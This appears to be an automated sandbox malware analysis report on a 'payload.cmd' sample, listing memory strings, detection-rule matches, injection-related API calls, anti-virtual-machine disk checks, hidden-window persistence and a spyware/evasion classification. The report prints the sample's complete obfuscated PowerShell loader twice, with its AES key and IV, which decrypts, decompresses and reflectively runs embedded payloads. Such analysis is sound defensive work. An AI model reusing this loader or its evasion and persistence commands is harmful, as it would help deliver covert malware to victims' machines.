Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002B.00000002.2594057411.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079470975.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000002B.00000000.2079135025.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2586980188.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.mic
Source: powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.micom/fwlink/?LinkI
Source: powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CE2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 0000002D.00000002.2645406461.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002D.00000000.2095647683.00000262ED790000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://osoft.co_2010-06X
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000001D.00000002.2617048225.0000025785F60000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6xGh
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.2076913027.000001908E0C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.7:49720 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5760, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB7A0C5D NtWriteVirtualMemory, 39_2_00007FFAAB7A0C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB7A0FE4 NtResumeThread, 39_2_00007FFAAB7A0FE4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB79DF98 NtUnmapViewOfSection, 39_2_00007FFAAB79DF98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB7A0F20 NtSetContextThread, 39_2_00007FFAAB7A0F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB79E078 NtUnmapViewOfSection, 39_2_00007FFAAB79E078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB7A0A3E NtUnmapViewOfSection, 39_2_00007FFAAB7A0A3E
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 41_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, 42_2_000001CA7D1E2C80
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW, 43_2_0000017D2DD52300
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D02C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, 45_2_00000262F1D02C80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-9pdB1aHK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_pvursesw.30i.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2684
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: unknown Process created: Commandline size = 5417
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2684
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5760, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.spyw.evad.winCMD@54/88@2/2
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 41_2_0000000140002D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 38_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 38_2_004017A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\6273870
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2332:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5760
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\2851471
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\364263
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1riomnp1.nuz.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 2424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 2388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
